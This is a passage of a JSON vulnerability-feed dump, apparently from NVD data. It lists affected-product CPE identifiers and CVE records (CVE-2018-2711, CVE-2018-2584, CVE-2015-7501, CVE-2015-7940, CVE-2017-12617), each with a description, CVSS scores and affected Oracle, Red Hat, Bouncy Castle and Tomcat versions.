"cpe:2.3:o:redhat:enterprise_linux_server_aus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_pricing_design_center:11.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:14.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:14.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_advanced_spatial_and_operational_analytics:2.7.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:snapcenter:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_connector_for_siebel:10.4.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.3:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:storage_automation_store:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:19.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_management_suite:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_aus:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_interactive_session_recorder:6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_converged_application_server_-_service_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:3.4.7.4297:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:utilities_work_and_asset_management:1.9.1.2.12:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:in-memory_performance-driven_planning:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:fuse:1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:5.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_advanced_inventory_planning:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:12.1.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:configuration_manager:12.1.2.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_fin_install:9.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_online_mediation_controller:6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:14.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_hedge_management_and_ifrs_valuations:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_integration_bus:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_open_commerce_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_behavior_detection_platform:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_analytics:11.1.1.5.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_tus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_api_services:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.9:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_calculation_engine:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_service_broker:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.8:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:12.2.1.4.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.10:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:10.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:siebel_ui_framework:18.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.10:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:7.3.3.0.2:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jd_edwards_enterpriseone_tools:4.0.1.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:endeca_information_discovery_studio:3.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:10.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_extract_transform_and_load:13.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:soa_suite:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:mysql_enterprise_monitor:4.0.4.5235:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:14.0.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:17.12.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:primavera_gateway:16.2.11:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:10.3.6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:weblogic_server:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:16.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_oracle_database:12.1.0.8:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:12.2.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.9:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:identity_management_suite:11.1.2.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:instantis_enterprisetrack:17.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:11.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_server_eus:7.6:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:rapid_planning:12.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:autovue_vuelink_integration:21.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:flexcube_investor_servicing:12.0.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:communications_pricing_design_center:12.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_profitability_management:8.0.7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_regulatory_reporting_with_agilereporter:8.0.9.2.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_loan_loss_forecasting_and_provisioning:8.0.5:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:bi_publisher:12.2.1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation_for_mobile_devices:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:netapp:oncommand_insight:-:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_for_fusion_middleware:13.2.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:policy_automation:10.4.7:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:retail_service_backbone:15.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:13.3.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_policy_administration:11.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_analytical_applications_infrastructure:8.0.7.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:insurance_rules_palette:10.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:goldengate:12.3.2.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux_workstation:7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:banking_platform:2.6.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_profitability_management:6.1.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:financial_services_lending_and_leasing:14.8.0:*:*:*:*:*:*:*", "cpe:2.3:o:redhat:enterprise_linux:7.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:14:26", "description": "Vulnerability in the Oracle JDeveloper component of Oracle Fusion Middleware (subcomponent: Security Framework). Supported versions that are affected are 11.1.1.2.4, 11.1.1.7.0, 11.1.1.7.1, 11.1.1.9.0 and 12.1.3.0.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks require human interaction from a person other than the attacker and while the vulnerability is in Oracle JDeveloper, attacks may significantly impact additional products. Successful attacks of this vulnerability can result in unauthorized access to critical data or complete access to all Oracle JDeveloper accessible data as well as unauthorized update, insert or delete access to some of Oracle JDeveloper accessible data. CVSS 3.0 Base Score 8.2 (Confidentiality and Integrity impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 8.2, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:H/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 4.7}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2711", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 4.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2711"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/a:oracle:jdeveloper:11.1.1.7.0", "cpe:/a:oracle:jdeveloper:11.1.1.2.4", "cpe:/a:oracle:jdeveloper:11.1.1.9.0", "cpe:/a:oracle:jdeveloper:12.1.3.0.0", "cpe:/a:oracle:jdeveloper:11.1.1.7.1"], "id": "CVE-2018-2711", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2711", "cvss": {"score": 5.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:N"}, "cpe23": ["cpe:2.3:a:oracle:jdeveloper:11.1.1.7.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.9.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.2.4:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:12.1.3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:jdeveloper:11.1.1.7.1:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:13:45", "description": "Vulnerability in the Oracle WebCenter Sites component of Oracle Fusion Middleware (subcomponent: Advanced UI). The supported version that is affected is 11.1.1.8.0. Easily exploitable vulnerability allows low privileged attacker with network access via HTTP to compromise Oracle WebCenter Sites. Successful attacks of this vulnerability can result in unauthorized read access to a subset of Oracle WebCenter Sites accessible data. CVSS 3.0 Base Score 4.3 (Confidentiality impacts). CVSS Vector: (CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N).", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "LOW", "baseScore": 4.3, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 1.4}, "published": "2018-01-18T02:29:00", "type": "cve", "title": "CVE-2018-2584", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.0, "vectorString": "AV:N/AC:L/Au:S/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "SINGLE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-2584"], "modified": "2020-08-24T17:37:00", "cpe": ["cpe:/a:oracle:webcenter_sites:11.1.1.8.0"], "id": "CVE-2018-2584", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2018-2584", "cvss": {"score": 4.0, "vector": "AV:N/AC:L/Au:S/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:a:oracle:webcenter_sites:11.1.1.8.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:14:43", "description": "Red Hat JBoss A-MQ 6.x; BPM Suite (BPMS) 6.x; BRMS 6.x and 5.x; Data Grid (JDG) 6.x; Data Virtualization (JDV) 6.x and 5.x; Enterprise Application Platform 6.x, 5.x, and 4.3.x; Fuse 6.x; Fuse Service Works (FSW) 6.x; Operations Network (JBoss ON) 3.x; Portal 6.x; SOA Platform (SOA-P) 5.x; Web Server (JWS) 3.x; Red Hat OpenShift/xPAAS 3.x; and Red Hat Subscription Asset Manager 1.3 allow remote attackers to execute arbitrary commands via a crafted serialized Java object, related to the Apache Commons Collections (ACC) library.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2017-11-09T17:29:00", "type": "cve", "title": "CVE-2015-7501", "cwe": ["CWE-502"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": true, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7501"], "modified": "2020-07-15T03:15:00", "cpe": ["cpe:/a:redhat:data_grid:6.0.0", "cpe:/a:redhat:jboss_fuse_service_works:6.0", "cpe:/a:redhat:jboss_enterprise_application_platform:5.0.0", "cpe:/a:redhat:jboss_enterprise_application_platform:4.3.0", "cpe:/a:redhat:jboss_data_virtualization:6.0.0", "cpe:/a:redhat:jboss_a-mq:6.0.0", "cpe:/a:redhat:jboss_portal:6.0.0", "cpe:/a:redhat:jboss_bpm_suite:6.0.0", "cpe:/a:redhat:jboss_enterprise_web_server:3.0.0", "cpe:/a:redhat:jboss_data_virtualization:5.0.0", "cpe:/a:redhat:xpaas:3.0.0", "cpe:/a:redhat:subscription_asset_manager:1.3.0", "cpe:/a:redhat:jboss_operations_network:3.0", "cpe:/a:redhat:jboss_enterprise_brms_platform:6.0.0", "cpe:/a:redhat:jboss_enterprise_soa_platform:5.0.0", "cpe:/a:redhat:openshift:3.0", "cpe:/a:redhat:jboss_enterprise_application_platform:6.0.0", "cpe:/a:redhat:jboss_enterprise_brms_platform:5.0.0", "cpe:/a:redhat:jboss_fuse:6.0.0"], "id": "CVE-2015-7501", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7501", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:a:redhat:jboss_enterprise_brms_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_web_server:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_data_virtualization:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_portal:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:openshift:3.0:*:*:*:enterprise:*:*:*", "cpe:2.3:a:redhat:data_grid:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_brms_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:subscription_asset_manager:1.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_bpm_suite:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_fuse_service_works:6.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:xpaas:3.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_a-mq:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:4.3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_application_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_enterprise_soa_platform:5.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_data_virtualization:6.0.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_operations_network:3.0:*:*:*:*:*:*:*", "cpe:2.3:a:redhat:jboss_fuse:6.0.0:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-06T15:16:59", "description": "The Bouncy Castle Java library before 1.51 does not validate a point is withing the elliptic curve, which makes it easier for remote attackers to obtain private keys via a series of crafted elliptic curve Diffie Hellman (ECDH) key exchanges, aka an \"invalid curve attack.\"", "cvss3": {}, "published": "2015-11-09T16:59:00", "type": "cve", "title": "CVE-2015-7940", "cwe": ["CWE-200", "CWE-310"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-7940"], "modified": "2019-01-16T19:29:00", "cpe": ["cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.55", "cpe:/a:oracle:enterprise_manager_ops_center:12.1.4", "cpe:/a:oracle:application_testing_suite:12.5.0.1", "cpe:/a:oracle:peoplesoft_enterprise_peopletools:8.54", "cpe:/a:bouncycastle:bouncy_castle_crypto_package:1.50", "cpe:/a:oracle:application_testing_suite:12.5.0.2", "cpe:/a:oracle:enterprise_manager_ops_center:12.2.2", "cpe:/a:oracle:application_testing_suite:12.5.0.3", "cpe:/o:opensuse:leap:42.1", "cpe:/o:opensuse:opensuse:13.1", "cpe:/o:opensuse:opensuse:13.2", "cpe:/a:oracle:virtual_desktop_infrastructure:3.5.2"], "id": "CVE-2015-7940", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2015-7940", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:opensuse:opensuse:13.2:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:leap:42.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:virtual_desktop_infrastructure:3.5.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.54:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.1.4:*:*:*:*:*:*:*", "cpe:2.3:o:opensuse:opensuse:13.1:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.1:*:*:*:*:*:*:*", "cpe:2.3:a:bouncycastle:bouncy_castle_crypto_package:1.50:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:enterprise_manager_ops_center:12.2.2:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:application_testing_suite:12.5.0.3:*:*:*:*:*:*:*", "cpe:2.3:a:oracle:peoplesoft_enterprise_peopletools:8.55:*:*:*:*:*:*:*"]}, {"lastseen": "2023-12-08T17:57:03", "description": "When running Apache Tomcat versions 9.0.0.M1 to 9.0.0, 8.5.0 to 8.5.22, 8.0.0.RC1 to 8.0.46 and 7.0.0 to 7.0.81 with HTTP PUTs enabled (e.g. via setting the readonly initialisation parameter of the Default servlet to false) it was possible to upload a JSP file to the server via a specially crafted request. This JSP could then be requested and any code it contained would be executed by the server.", "cvss3": {"exploitabilityScore": 2.2, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.1, "vectorString": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "NONE"}, "source": "nvd@nist.gov", "type": "Primary", "impactScore": 5.9}, "published": "2017-10-04T01:29:02", "type": "cve", "title": "CVE-2017-12617", "cwe": ["CWE-434"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "source": "nvd@nist.gov", "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "type": "Primary", "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-12617"], "modified": "2023-12-08T16:41:18", "cpe": ["cpe:/a:apache:tomcat:7.0.0", "cpe:/a:apache:tomcat:7.0.1", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:7.0.2", "cpe:/a:apache:tomcat:7.0.3", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.4", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:7.0.5", "cpe:/a:apache:tomcat:7.0.6", "cpe:/a:apache:tomcat:7.0.7", "cpe:/a:apache:tomcat:7.0.8", "cpe:/a:apache:tomcat:7.0.9", "cpe:/a:apache:tomcat:7.0.10", "cpe:/a:apache:tomcat:7.0.11", "cpe:/a:apache:tomcat:7.0.12", "cpe:/a:apache:tomcat:7.0.13", "cpe:/a:apache:tomcat:7.0.14", "cpe:/a:apache:tomcat:7.0.15", "cpe:/a:apache:tomcat:7.0.16", "cpe:/a:apache:tomcat:7.0.17", "cpe:/a:apache:tomcat:7.0.18", "cpe:/a:apache:tomcat:7.0.19", "cpe:/a:apache:tomcat:7.0.20", "cpe:/a:apache:tomcat:7.0.21", "cpe:/a:apache:tomcat:7.0.22", "cpe:/a:apache:tomcat:7.0.23", "cpe:/a:apache:tomcat:7.0.24", "cpe:/a:apache:tomcat:7.0.25", "cpe:/a:apache:tomcat:7.0.26", "cpe:/a:apache:tomcat:7.0.27", "cpe:/a:apache:tomcat:7.0.28", "cpe:/a:apache:tomcat:7.0.29", "cpe:/a:apache:tomcat:7.0.30", "cpe:/a:apache:tomcat:7.0.31", "cpe:/a:apache:tomcat:7.0.32", "cpe:/a:apache:tomcat:7.0.33", "cpe:/a:apache:tomcat:7.0.34", "cpe:/a:apache:tomcat:7.0.35", "cpe:/a:apache:tomcat:7.0.36", "cpe:/a:apache:tomcat:7.0.37", "cpe:/a:apache:tomcat:7.0.38", "cpe:/a:apache:tomcat:7.0.39", "cpe:/a:apache:tomcat:7.0.40", "cpe:/a:apache:tomcat:7.0.41", "cpe:/a:apache:tomcat:7.0.42", "cpe:/a:apache:tomcat:7.0.43", "cpe:/a:apache:tomcat:7.0.44", "cpe:/a:apache:tomcat:7.0.45", "cpe:/a:apache:tomcat:7.0.46", "cpe:/a:apache:tomcat:7.0.47", "cpe:/a:apache:tomcat:7.0.48", "cpe:/a:apache:tomcat:7.0.49", "cpe:/a:apache:tomcat:7.0.50", "cpe:/a:apache:tomcat:7.0.51", "cpe:/a:apache:tomcat:7.0.54", "cpe:/a:apache:tomcat:7.0.55", "cpe:/a:apache:tomcat:7.0.56", "cpe:/a:apache:tomcat:7.0.57", "cpe:/a:apache:tomcat:7.0.58", "cpe:/a:apache:tomcat:7.0.59", "cpe:/a:apache:tomcat:7.0.60", "cpe:/a:apache:tomcat:7.0.61", "cpe:/a:apache:tomcat:7.0.62", "cpe:/a:apache:tomcat:7.0.63", "cpe:/a:apache:tomcat:7.0.64", "cpe:/a:apache:tomcat:7.0.65", "cpe:/a:apache:tomcat:7.0.66", "cpe:/a:apache:tomcat:7.0.67", "cpe:/a:apache:tomcat:7.0.68", "cpe:/a:apache:tomcat:7.0.69", "cpe:/a:apache:tomcat:7.0.70", "cpe:/a:apache:tomcat:7.0.71", "cpe:/a:apache:tomcat:7.0.72", "cpe:/a:apache:tomcat:7.0.73", "cpe:/a:apache:tomcat:7.0.74", "cpe:/a:apache:tomcat:7.0.75", "cpe:/a:apache:tomcat:7.0.76", "cpe:/a:apache:tomcat:7.0.77", "cpe:/a:apache:tomcat:7.0.79", "cpe:/a:apache:tomcat:7.0.80", "cpe:/a:apache:tomcat:7.0.81", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:8.0.0", "cpe:/a:apache:tomcat:8.0.1", "cpe:/a:apache:tomcat:8.0.2", "cpe:/a:apache:tomcat:8.0.4", "cpe:/a:apache:tomcat:8.0.6", "cpe:/a:apache:tomcat:8.0.7", "cpe:/a:apache:tomcat:8.0.9", "cpe:/a:apache:tomcat:8.0.10", "cpe:/a:apache:tomcat:8.0.11", "cpe:/a:apache:tomcat:8.0.12", "cpe:/a:apache:tomcat:8.0.13", "cpe:/a:apache:tomcat:8.0.14", "cpe:/a:apache:tomcat:8.0.15", "cpe:/a:apache:tomcat:8.0.16", 